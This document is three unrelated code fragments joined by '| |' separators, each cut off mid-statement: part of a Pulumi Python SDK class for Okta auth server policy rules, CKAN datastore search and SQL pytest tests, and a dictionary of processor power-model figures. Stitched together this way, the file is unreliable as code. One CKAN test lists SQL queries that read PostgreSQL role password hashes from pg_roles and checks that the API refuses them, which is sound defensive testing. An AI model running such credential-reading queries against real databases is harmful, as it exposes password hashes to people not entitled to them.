if group_whitelists is not None:
pulumi.set(__self__, "group_whitelists", group_whitelists)
if inline_hook_id is not None:
pulumi.set(__self__, "inline_hook_id", inline_hook_id)
if name is not None:
pulumi.set(__self__, "name", name)
if refresh_token_lifetime_minutes is not None:
pulumi.set(__self__, "refresh_token_lifetime_minutes", refresh_token_lifetime_minutes)
if refresh_token_window_minutes is not None:
pulumi.set(__self__, "refresh_token_window_minutes", refresh_token_window_minutes)
if scope_whitelists is not None:
pulumi.set(__self__, "scope_whitelists", scope_whitelists)
if status is not None:
pulumi.set(__self__, "status", status)
if type is not None:
pulumi.set(__self__, "type", type)
if user_blacklists is not None:
pulumi.set(__self__, "user_blacklists", user_blacklists)
if user_whitelists is not None:
pulumi.set(__self__, "user_whitelists", user_whitelists)
@property
@pulumi.getter(name="authServerId")
def auth_server_id(self) -> pulumi.Input[str]:
"""
Auth Server ID.
"""
return pulumi.get(self, "auth_server_id")
@auth_server_id.setter
def auth_server_id(self, value: pulumi.Input[str]):
pulumi.set(self, "auth_server_id", value)
@property
@pulumi.getter(name="grantTypeWhitelists")
def grant_type_whitelists(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
Accepted grant type values, `"authorization_code"`, `"implicit"`, `"password"` or `"client_credentials"`. For `"implicit"` value either `user_whitelist` or `group_whitelist` should be set.
"""
return pulumi.get(self, "grant_type_whitelists")
@grant_type_whitelists.setter
def grant_type_whitelists(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "grant_type_whitelists", value)
@property
@pulumi.getter(name="policyId")
def policy_id(self) -> pulumi.Input[str]:
"""
Auth Server Policy ID.
"""
return pulumi.get(self, "policy_id")
@policy_id.setter
def policy_id(self, value: pulumi.Input[str]):
pulumi.set(self, "policy_id", value)
@property
@pulumi.getter
def priority(self) -> pulumi.Input[int]:
"""
Priority of the auth server policy rule.
"""
return pulumi.get(self, "priority")
@priority.setter
def priority(self, value: pulumi.Input[int]):
pulumi.set(self, "priority", value)
@property
@pulumi.getter(name="accessTokenLifetimeMinutes")
def access_token_lifetime_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Lifetime of access token. Can be set to a value between 5 and 1440 minutes.
"""
return pulumi.get(self, "access_token_lifetime_minutes")
@access_token_lifetime_minutes.setter
def access_token_lifetime_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "access_token_lifetime_minutes", value)
@property
@pulumi.getter(name="groupBlacklists")
def group_blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a set of Groups whose Users are to be excluded.
"""
return pulumi.get(self, "group_blacklists")
@group_blacklists.setter
def group_blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "group_blacklists", value)
@property
@pulumi.getter(name="groupWhitelists")
def group_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a set of Groups whose Users are to be included. Can be set to Group ID or to the following: "EVERYONE".
"""
return pulumi.get(self, "group_whitelists")
@group_whitelists.setter
def group_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "group_whitelists", value)
@property
@pulumi.getter(name="inlineHookId")
def inline_hook_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the inline token to trigger.
"""
return pulumi.get(self, "inline_hook_id")
@inline_hook_id.setter
def inline_hook_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "inline_hook_id", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Auth Server Policy Rule name.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter(name="refreshTokenLifetimeMinutes")
def refresh_token_lifetime_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Lifetime of refresh token.
"""
return pulumi.get(self, "refresh_token_lifetime_minutes")
@refresh_token_lifetime_minutes.setter
def refresh_token_lifetime_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "refresh_token_lifetime_minutes", value)
@property
@pulumi.getter(name="refreshTokenWindowMinutes")
def refresh_token_window_minutes(self) -> Optional[pulumi.Input[int]]:
"""
Window in which a refresh token can be used. It can be a value between 5 and 2628000 (5 years) minutes.
`"refresh_token_window_minutes"` must be between `"access_token_lifetime_minutes"` and `"refresh_token_lifetime_minutes"`.
"""
return pulumi.get(self, "refresh_token_window_minutes")
@refresh_token_window_minutes.setter
def refresh_token_window_minutes(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "refresh_token_window_minutes", value)
@property
@pulumi.getter(name="scopeWhitelists")
def scope_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Scopes allowed for this policy rule. They can be whitelisted by name or all can be whitelisted with `"*"`.
"""
return pulumi.get(self, "scope_whitelists")
@scope_whitelists.setter
def scope_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "scope_whitelists", value)
@property
@pulumi.getter
def status(self) -> Optional[pulumi.Input[str]]:
"""
The status of the Auth Server Policy Rule.
"""
return pulumi.get(self, "status")
@status.setter
def status(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "status", value)
@property
@pulumi.getter
def type(self) -> Optional[pulumi.Input[str]]:
"""
The type of the Auth Server Policy Rule.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "type", value)
@property
@pulumi.getter(name="userBlacklists")
def user_blacklists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a set of Users to be excluded.
"""
return pulumi.get(self, "user_blacklists")
@user_blacklists.setter
def user_blacklists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "user_blacklists", value)
@property
@pulumi.getter(name="userWhitelists")
def user_whitelists(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a set of Users to be included.
"""
return pulumi.get(self, "user_whitelists")
@user_whitelists.setter
def user_whitelists(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "user_whitelists", value)
@pulumi.input_type
class _ServerPolicyRuleState:
def __init__(__self__, *,
access_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
auth_server_id: Optional[pulumi.Input[str]] = None,
grant_type_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
group_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
group_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
inline_hook_id: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
policy_id: Optional[pulumi.Input[str]] = None,
priority: Optional[pulumi.Input[int]] = None,
refresh_token_lifetime_minutes: Optional[pulumi.Input[int]] = None,
refresh_token_window_minutes: Optional[pulumi.Input[int]] = None,
scope_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
status: Optional[pulumi.Input[str]] = None,
type: Optional[pulumi.Input[str]] = None,
user_blacklists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
user_whitelists: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Input properties used for looking up and filtering ServerPolicyRule resources.
:param pulumi.Input[int] access_token_lifetime_minutes: Lifetime of access token. Can be set to a value between 5 and 1440 minutes.
:param pulumi.Input[str] auth_server_id: Auth Server ID.
:param pulumi.Input[Sequence[pulumi.Input[str]]] grant_type_whitelists: Accepted grant type values, `"authorization_code"`, `"implicit"`, `"password"` or `"client_credentials"`. For `"implicit"` value either `user_whitelist` or `group_whitelist` should be set.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_blacklists: Specifies a set of Groups whose Users are to be excluded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] group_whitelists: Specifies a set of Groups whose Users are to be included. Can be set to Group ID or to the following: "EVERYONE".
:param pulumi.Input[str] inline_hook_id: The ID of the inline token to trigger.
:param pulumi.Input[str] name: Auth Server Policy Rule name.
:param pulumi.Input[str] policy_id: Auth Server Policy ID.
:param pulumi.Input[int] priority: Priority of the auth server policy rule.
:param pulumi.Input[int] refresh_token_lifetime_minutes: Lifetime of refresh token.
:param pulumi.Input[int] refresh_token_window_minutes: Window in which a refresh token can be used. It can be a value between 5 and 2628000 (5 years) minutes.
`"refresh_token_window_minutes"` must be between `"access_token_lifetime_minutes"` and `"refresh_token_lifetime_minutes"`.
:param pulumi.Input[Sequence[pulumi.Input[str]]] scope_whitelists: Scopes allowed for this policy rule. They can be whitelisted by name or all can be whitelisted with `"*"`.
:param pulumi.Input[str] status: The status of the Auth Server Policy Rule.
:param pulumi.Input[str] type: The type of the Auth Server Policy Rule.
:param pulumi.Input[Sequence[pulumi.Input[str]]] user_blacklists: Specifies a set of Users to be excluded.
:param pulumi.Input[Sequence[pulumi.Input[str]]] user_whitelists: Specifies a set of Users to be included.
"""
if access_token_lifetime_minutes is not None:
pulumi.set(__self__, "access_token_lifetime_minutes", access_token_lifetime_minutes)
if auth_server_id is not None:
pulumi.set(__self__, "auth_server_id", auth_server_id)
if grant_type_whitelists is not None:
pulumi.set(__self__, "grant_type_whitelists", grant_type_whitelists)
if group_blacklists is not None:
pulumi.set(__self__, "group_blacklists", group_blacklists)
if group_whitelists is not None:
pulumi.set(__self__, "group_whitelists", group_whitelists)
if | |
u"author",
u"b\xfck",
u"nested",
u"published",
u"characters",
u"rating with %",
],
)
]
assert results == [self.expected_records[0]], results["records"]
for field in expected_fields:
assert field in result["fields"], field
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {u"b\xfck": "annakarenina"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_on_specific_column_even_if_q_is_a_json_string(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"q": u'{"b\xfck": "annakarenina"}',
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
assert len(res_dict["result"]["records"]) == 1
assert (
res_dict["result"]["records"][0]["_id"]
== self.expected_records[0]["_id"]
)
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_name(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"invalid_field_name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text_invalid_field_value(self, app):
data = {
"resource_id": self.data["resource_id"],
"q": {"author": ["invalid", "value"]},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_table_metadata(self, app):
data = {"resource_id": "_table_metadata"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_filters_not_as_dict(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": "the-filter",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_filters(
self, app
):
data = {
"resource_id": self.data["resource_id"],
"filters": {"invalid-column-name": "value"},
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("filters") is not None, res_dict["error"]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_is_unsuccessful_when_called_with_invalid_fields(self, app):
data = {
"resource_id": self.data["resource_id"],
"fields": ["invalid-column-name"],
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search",
json=data,
extra_environ=auth,
status=409,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"].get("fields") is not None, res_dict["error"]
class TestDatastoreFullTextSearchLegacyTests(object):
@pytest.fixture(autouse=True)
def initial_data(self, clean_datastore, app):
ctd.CreateTestData.create()
self.sysadmin_user = model.User.get("testsysadmin")
self.normal_user = model.User.get("annafan")
resource = model.Package.get("annakarenina").resources[0]
self.data = dict(
resource_id=resource.id,
force=True,
fields=[
{"id": "id"},
{"id": "date", "type": "date"},
{"id": "x"},
{"id": "y"},
{"id": "z"},
{"id": "country"},
{"id": "title"},
{"id": "lat"},
{"id": "lon"},
],
records=[
{
"id": 0,
"date": "2011-01-01",
"x": 1,
"y": 2,
"z": 3,
"country": "DE",
"title": "first 99",
"lat": 52.56,
"lon": 13.40,
},
{
"id": 1,
"date": "2011-02-02",
"x": 2,
"y": 4,
"z": 24,
"country": "UK",
"title": "second",
"lat": 54.97,
"lon": -1.60,
},
{
"id": 2,
"date": "2011-03-03",
"x": 3,
"y": 6,
"z": 9,
"country": "US",
"title": "third",
"lat": 40.00,
"lon": -75.5,
},
{
"id": 3,
"date": "2011-04-04",
"x": 4,
"y": 8,
"z": 6,
"country": "UK",
"title": "fourth",
"lat": 57.27,
"lon": -6.20,
},
{
"id": 4,
"date": "2011-05-04",
"x": 5,
"y": 10,
"z": 15,
"country": "UK",
"title": "fifth",
"lat": 51.58,
"lon": 0,
},
{
"id": 5,
"date": "2011-06-02",
"x": 6,
"y": 12,
"z": 18,
"country": "DE",
"title": "sixth 53.56",
"lat": 51.04,
"lon": 7.9,
},
],
)
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_create", json=self.data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_search_full_text(self, app):
data = {"resource_id": self.data["resource_id"], "q": "DE"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 2
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_advanced_search_full_text(self, app):
data = {
"resource_id": self.data["resource_id"],
"plain": "False",
"q": "DE | UK",
}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 5
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_integers_within_text_strings(self, app):
data = {"resource_id": self.data["resource_id"], "q": "99"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_integers(self, app):
data = {"resource_id": self.data["resource_id"], "q": "4"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 3
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_decimal_within_text_strings(self, app):
data = {"resource_id": self.data["resource_id"], "q": "53.56"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_decimal(self, app):
data = {"resource_id": self.data["resource_id"], "q": "52.56"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_date(self, app):
data = {"resource_id": self.data["resource_id"], "q": "2011-01-01"}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["result"]["total"] == 1
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_full_text_search_on_json_like_string_succeeds(self, app):
data = {"resource_id": self.data["resource_id"], "q": '"{}"'}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"]
class TestDatastoreSQLLegacyTests(object):
sysadmin_user = None
normal_user = None
@pytest.fixture(autouse=True)
def initial_data(self, clean_datastore, app):
ctd.CreateTestData.create()
self.sysadmin_user = model.User.get("testsysadmin")
self.normal_user = model.User.get("annafan")
self.dataset = model.Package.get("annakarenina")
resource = self.dataset.resources[0]
self.data = {
"resource_id": resource.id,
"force": True,
"aliases": "books4",
"fields": [
{"id": u"b\xfck", "type": "text"},
{"id": "author", "type": "text"},
{"id": "published"},
],
"records": [
{
u"b\xfck": "annakarenina",
"author": "tolstoy",
"published": "2005-03-01",
"nested": ["b", {"moo": "moo"}],
},
{
u"b\xfck": "warandpeace",
"author": "tolstoy",
"nested": {"a": "b"},
},
],
}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_create", json=self.data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
# Make an organization, because private datasets must belong to one.
self.organization = tests.call_action_api(
app,
"organization_create",
name="test_org",
apikey=self.sysadmin_user.apikey,
)
self.expected_records = [
{
u"_full_text": [
u"'annakarenina'",
u"'b'",
u"'moo'",
u"'tolstoy'",
u"'2005'",
],
u"_id": 1,
u"author": u"tolstoy",
u"b\xfck": u"annakarenina",
u"nested": [u"b", {u"moo": u"moo"}],
u"published": u"2005-03-01T00:00:00",
},
{
u"_full_text": [u"'tolstoy'", u"'warandpeac'", u"'b'"],
u"_id": 2,
u"author": u"tolstoy",
u"b\xfck": u"warandpeace",
u"nested": {u"a": u"b"},
u"published": None,
},
]
self.expected_join_results = [
{u"first": 1, u"second": 1},
{u"first": 1, u"second": 2},
]
engine = db.get_write_engine()
self.Session = orm.scoped_session(orm.sessionmaker(bind=engine))
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_select_where_like_with_percent(self, app):
query = 'SELECT * FROM public."{0}" WHERE "author" LIKE \'tol%\''.format(
self.data["resource_id"]
)
data = {"sql": query}
auth = {"Authorization": str(self.sysadmin_user.apikey)}
res = app.post(
"/api/action/datastore_search_sql", json=data, extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert len(result["records"]) == len(self.expected_records)
for (row_index, row) in enumerate(result["records"]):
expected_row = self.expected_records[row_index]
assert set(row.keys()) == set(expected_row.keys())
for field in row:
if field == "_full_text":
for ft_value in expected_row["_full_text"]:
assert ft_value in row["_full_text"]
else:
assert row[field] == expected_row[field]
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_self_join(self, app):
query = """
select a._id as first, b._id as second
from "{0}" AS a,
"{0}" AS b
where a.author = b.author
limit 2
""".format(
self.data["resource_id"]
)
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search_sql",
json={"sql": query},
extra_environ=auth,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is True
result = res_dict["result"]
assert result["records"] == self.expected_join_results
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures(
"clean_datastore", "with_plugins", "with_request_context"
)
def test_new_datastore_table_from_private_resource(self, app):
# make a private CKAN resource
group = self.dataset.get_groups()[0]
context = {
"user": self.sysadmin_user.name,
"ignore_auth": True,
"model": model,
}
package = p.toolkit.get_action("package_create")(
context,
{
"name": "privatedataset",
"private": True,
"owner_org": self.organization["id"],
"groups": [{"id": group.id}],
},
)
resource = p.toolkit.get_action("resource_create")(
context,
{
"name": "privateresource",
"url": "https://www.example.com/",
"package_id": package["id"],
},
)
auth = {"Authorization": str(self.sysadmin_user.apikey)}
helpers.call_action(
"datastore_create", resource_id=resource["id"], force=True
)
# new resource should be private
query = 'SELECT * FROM "{0}"'.format(resource["id"])
data = {"sql": query}
auth = {"Authorization": str(self.normal_user.apikey)}
res = app.post(
"/api/action/datastore_search_sql",
json=data,
extra_environ=auth,
status=403,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"]["__type"] == "Authorization Error"
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures("clean_datastore", "with_plugins")
def test_not_authorized_to_access_system_tables(self, app):
test_cases = [
"SELECT * FROM pg_roles",
"SELECT * FROM pg_catalog.pg_database",
"SELECT rolpassword FROM pg_roles",
"""SELECT p.rolpassword
FROM pg_roles p
JOIN "{0}" r
ON p.rolpassword = r.author""".format(
self.data["resource_id"]
),
]
for query in test_cases:
data = {"sql": query.replace("\n", "")}
res = app.post(
"/api/action/datastore_search_sql", json=data, status=403,
)
res_dict = json.loads(res.data)
assert res_dict["success"] is False
assert res_dict["error"]["__type"] == "Authorization Error"
class TestDatastoreSQLFunctional(object):
@pytest.mark.ckan_config("ckan.plugins", "datastore")
@pytest.mark.usefixtures(
"clean_datastore", "with_plugins", "with_request_context"
)
def test_search_sql_enforces_private(self):
user1 = factories.User()
user2 = factories.User()
user3 = factories.User()
ctx1 | |
0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.139608,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 2.62917,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0329262,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.228551,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.171079,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.0902112,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.145507,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.0734472,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.309166,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.0769468,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.2786,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0323204,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00378386,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0399629,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.027984,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.0722833,
'Execution Unit/Register Files/Runtime Dynamic': 0.0317678,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.092424,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.244943,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.2198,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000334333,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
